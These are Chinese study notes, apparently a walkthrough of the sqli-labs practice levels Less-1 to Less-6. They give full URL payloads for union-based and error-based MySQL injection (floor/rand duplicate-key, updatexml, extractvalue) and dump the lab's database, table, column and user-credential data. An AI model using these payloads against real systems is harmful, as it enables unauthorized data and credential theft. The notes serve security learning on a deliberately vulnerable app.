SQL/Less-1
单引号字符串型回显注入
1.判断闭合字符
http://182.92.220.201/Less-1/?id=1'
#报错信息use near ''1'' LIMIT 0,1' at line 1 (报错片段里 1 两侧各多出一个单引号, 说明参数被拼在单引号字符串里: where id='1'' LIMIT 0,1, 因此要用 ' 来闭合)
http://182.92.220.201/Less-1/?id=1' and 1=1 -- =
#正常
#注意:MySQL 的注释符 -- 后面必须紧跟一个空白字符才生效; 浏览器和服务端会把 URL 末尾的空格去掉, 所以在空格后再补一个无意义字符(这里用 =)把空格保住, 也可以改用 --+ 或 %23(即 #) 作注释
http://182.92.220.201/Less-1/?id=1' and 1=2 -- =
#异常
http://182.92.220.201/Less-1/?id=1 and 1=2 -- =
#正常
#初步判断为单引号字符型注入: 不带引号的 id=1 and 1=2 -- = 仍然显示正常, 说明整段输入都留在字符串 '1 and 1=2 -- =' 里当作数据参与比较(MySQL 做隐式数字转换时只取前导的 1), and 1=2 并没有被当作 SQL 求值; 只有先用 ' 闭合字符串, 后面的 and 1=2 才真正生效
2.求列数
http://182.92.220.201/Less-1/?id=1' order by 4 -- =
#报错
http://182.92.220.201/Less-1/?id=1' order by 3-- =
#正常
3.求显示位
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,3 -- =
[截图缺失: image-20200811112128016.png (原外链图片未能转存), 此步结果: 页面上显示出 2、3 两个回显位]
4.爆库名
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,database() -- =
#爆出库名security
5.爆表名
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#爆出表名emails,referers,uagents,users
6.爆列名
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =
#爆出列名id,username,password
7.爆字段
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(id,username,password) from security.users -- =
#字段内容
/*1DumbDumb,2AngelinaI-kill-you,3Dummyp@ssword,4securecrappy,5stupidstupidity,6supermangenious,7batmanmob!le,8adminadmin,9admin1admin1,10admin2admin2,11admin3admin3,12dhakkandumbo,14admin4admin4
上面的输出里 id、username、password 直接连在一起无法区分边界, 所以用 0x23(即字符 #)作为分隔符拼进 group_concat */
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
#结果如下图所述
[截图缺失: image-20200811114035849.png (原外链图片未能转存), 此步结果: 每条记录以 #id#username#password 形式显示]
SQL/Less-2
1.判断闭合字符
?id=1'
#报错信息use near '' LIMIT 0,1' at line 1
?id=1' and 1=1 -- =
#报错: 数字型拼接后变成 where id=1' and 1=1 -- = LIMIT 0,1, 多出一个没有闭合的单引号
?id=1 and 1=1
#正常
?id=1 and 1=2 -- =
#异常
#初步判断为数字型SQL注入: 不加任何引号的 and 1=1 / and 1=2 就能直接改变页面结果, 说明参数没有被引号包裹, 直接拼进了 SQL
2.求列数
?id=1 order by 4 -- =
#报错
?id=1 order by 3 -- =
#有回显,判断为3列
3.得显示位
?id=1 and 1=2 union select 1,2,3 -- =
[截图缺失: image-20200811115537668.png (原外链图片未能转存), 此步结果: 回显位在 2、3 列]
4.爆库名
?id=1 and 1=2 union select 1,2,database() -- =
#爆出库名security
5.爆表名
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#表名emails,referers,uagents,users
6.爆列名
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- =
#列名id,username,password
7.爆字段
?id=1 and 1=2 union select 1,2,group_concat(0x3a,id,0x3a,username,0x3a,password) from security.users -- =
[截图缺失: image-20200811123529323.png (原外链图片未能转存), 此步结果: 每条记录以 :id:username:password 形式显示]
SQL/Less-3
1.判断闭合字符
http://172.168.30.176/Less-3/?id=1'
#报错信息use near ''1'') LIMIT 0,1' at line 1
http://172.168.30.176/Less-3/?id=1' and 1=1 -- =
#报错
?id=1 and 1=1 -- =
?id=1" and 1=1 -- =
#均不报错
?id=1 and 1=2 -- =
?id=1' and 1=2 -- =
?id=1" and 1=2 -- =
#都显示正常: 说明 1=2 根本没有被当作 SQL 求值, 注入内容仍然留在字符串里, 单独的 ' 或 " 都没能闭合; 回头看第 1 步报错片段里的 '') 可知字符串外面还套了一层括号, 于是尝试 ') 作闭合
http://172.168.30.176/Less-3/?id=1') and 1=2 -- =
#最后发现id=1') and 1=2 -- =异常
?id=1') and 1=1 -- =
#显示正常
#初步判断为单引号加括号的字符型注入: 后端拼接形如 where id=('1') LIMIT 0,1, 所以必须用 ') 同时闭合引号和括号
2.求列数
http://172.168.30.176/Less-3/?id=1') order by 3 -- =
#有回显
http://172.168.30.176/Less-3/?id=1') order by 4 -- =
#报错
#判断列数为3列
3.求显示位
http://172.168.30.176/Less-3/?id=1') and 1=2 union select 1,2,3 -- =
#显示位在2,3列
4.爆库名
http://172.168.30.176/Less-3/?id=1') and 1=2 union select 1,2,database()-- =
#得库名security
?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
#爆所有数据库的名称
5.爆表名
?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#表名emails,referers,uagents,users
6.爆列名
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =
#列名id,username,password
7.爆字段
?id=-1') union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
SQL/Less-4
1.判断闭合字符
http://172.168.30.176/Less-4/?id=1'
#正常,且有回显
http://172.168.30.176/Less-4/?id=1"
#报错 (原笔记此处抄的是 Less-3 的单引号报错片段; 结合 id=1' 正常、id=1" 报错以及下面用 ") 闭合成功来看, 这里的报错片段应为 near '"1"") LIMIT 0,1' at line 1, 即参数被拼在 ("...") 里)
http://172.168.30.176/Less-4/?id=1") and 1=1 -- =
#正常
http://172.168.30.176/Less-4/?id=1") and 1=2 -- =
#异常
#初步判断为括号双引号字符型注入
2.求列数
http://172.168.30.176/Less-4/?id=1") order by 3-- =
#正常 (order by 4 报错的结果此处未记录; 下一步 union select 1,2,3 能回显, 说明列数为 3)
3.求显示位
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,3-- =
#显示位在2,3列
4.爆库名
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,database()-- =
#得库名security
#爆所有数据库的名称
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata -- =
5.爆表名
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- =
#表名emails,referers,uagents,users
6.爆列名
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- =
#列名id,username,password
7.爆字段
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
SQL/Less-5
1.判断闭合字符
?id=1'
#报错信息use near ''1'' LIMIT 0,1' at line 1
http://172.168.30.176/Less-5/?id=1' and 1=1 -- =
#
[截图缺失: image-20200812112914454.png (原外链图片未能转存), 此处为 and 1=1 时的页面]
http://172.168.30.176/Less-5/?id=1' and 1=2 -- =
[截图缺失: image-20200812113021609.png (原外链图片未能转存), 此处为 and 1=2 时的页面, 与上图对比可看出真假条件下页面不同]
初步判断为单引号字符型注入, 但页面不回显查询出来的数据; 第 1 步表明 MySQL 的报错信息会原样输出到页面, 因此可以走报错注入, 只有当报错信息也被屏蔽时才需要退到布尔/时间盲注
2.求列数
http://172.168.30.176/Less-5/?id=1' order by 3-- =
3.求显示位
http://172.168.30.176/Less-5/?id=1' and 1=2 union select 1,2,3 -- =
#union 的结果没有任何回显位, 不能像前几关那样直接读数据; 由于报错信息可见, 下面改用报错注入(floor 重复键 / updatexml), 报错也不显示时才只能布尔或时间盲注
[截图缺失: image-20200812113329701.png (原外链图片未能转存), 此处为 union select 1,2,3 时的页面, 没有显示出任何数字]
4.爆库名
第一种方法使用floor()报错函数参考文章:https://www.cnblogs.com/-zhong/p/10892439.html
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果Duplicate entry 'security0' for key 'group_key' (库名随重复键报错带出; 注意 floor(rand()*2) 不带种子时分组冲突是概率性的, 偶尔不会报错需要重试, 写成 floor(rand(0)*2) 才能稳定复现)
第二种方法采用报错函数UPDATEXML (XML_document, XPath_string, new_value)
第一个参数:XML 文档, 内容无所谓, 填 1 或任意十六进制值(如 0x23)都可以
第二个参数:XPath 表达式, 把要读取的子查询拼进去并使其成为非法 XPath(通常用 0x7e 即 ~ 开头), MySQL 会把这个非法表达式原样放进 XPATH syntax error 的报错文本里, 数据就随报错带出
第三个参数:用来替换的新值, 任意填即可
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select concat(database())),0x7e),1) -- =
#结果显示 XPATH syntax error: '~security~'
5.爆表名
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#表名emails,referers,uagents,users (floor 这种写法一次只能带出一行, 需要依次改 limit 0,1、1,1、2,1、3,1 逐个取出, 上面的 limit 3,1 对应第 4 个表名)
第二方法
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema='security' ) ,0x7e),1) -- =
#结果 XPATH syntax error: '~emails,referers,uagents,users~'
6.爆列名
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果显示Duplicate entry 'username0' for key 'group_key'
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果显示 Duplicate entry 'password0' for key 'group_key'
第二种方法
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,( select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ,0x7e),1) -- =
7.爆字段
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果为 Duplicate entry 'Dumb0' for key 'group_key'
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select username from users limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果为 Duplicate entry 'Angelina1' for key 'group_key'
#这种方法只能一个个去爆字段
#实际上使用group_concat函数,就可以一下爆出所有字段
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,( select group_concat(0x23,username,0x23,password) from security.users) ,0x7e),1) -- =
#结果XPATH syntax error: '~#Dumb#Dumb,#Angelina#I-kill-you' (只带出了前两个用户: updatexml/extractvalue 的报错文本只显示前 32 个字符, 这里正好在第 32 个字符处被截断; 要拿到完整数据需用 substr(...,1,31)、substr(...,32,31) 分段, 或配合 limit 逐行取)
SQL/Less-6
1.判断闭合字符
http://172.168.30.176/Less-6/?id=1'
#显示正常,尝试双引号
http://172.168.30.176/Less-6/?id=1"
#报错信息syntax to use near '"1"" LIMIT 0,1' at line 1
http://172.168.30.176/Less-6/?id=1" and 1=1 -- =
#正常
http://172.168.30.176/Less-6/?id=1" and 1=2 -- =
#异常
#初步判断为双引号字符型注入(没有括号): 第 1 步报错片段 '"1"" LIMIT 0,1' 里只有双引号没有 ), 且 1" and 1=1 -- = 不加括号就能成功闭合, 这一点与 Less-4 的 (") 不同
2.求列数
http://172.168.30.176/Less-6/?id=1" order by 4 -- =
3.求显示位
http://172.168.30.176/Less-6/?id=-1" union select 1,2,3 -- =
#union 结果无回显位, 但第 1 步表明报错信息会显示在页面上, 考虑报错注入
这次使用extractvalue(,)报错函数
第一个参数:XML 片段, 内容无所谓, 填整数或十六进制值都可以
第二个参数:XPath 表达式, 把要读取的子查询拼进去使其成为非法 XPath, MySQL 报错时会把该表达式原样回显在 XPATH syntax error 里
4.爆库名
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,database())) -- =
#返回值为XPATH syntax error: 'security'
5.爆表名
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) -- =
#返回值XPATH syntax error: 'emails,referers,uagents,users'
6.爆列名
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) -- =
#返回值XPATH syntax error: 'id,username,password'
7.爆字段
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users))) -- =
#返回值XPATH syntax error: '#Dumb#Dumb,#Angelina#I-kill-you,' (同样只显示前 32 个字符, 第 32 个字符正好是逗号; 完整数据需用 substr 分段或 limit 逐行取)
(以下为第 6、7 步的重复记录, 已修正引号与注释符的编码问题)
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) -- =
#返回值XPATH syntax error: 'id,username,password'
## 7.爆字段
```SQL
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users))) -- =
#返回值XPATH syntax error: '#Dumb#Dumb,#Angelina#I-kill-you,'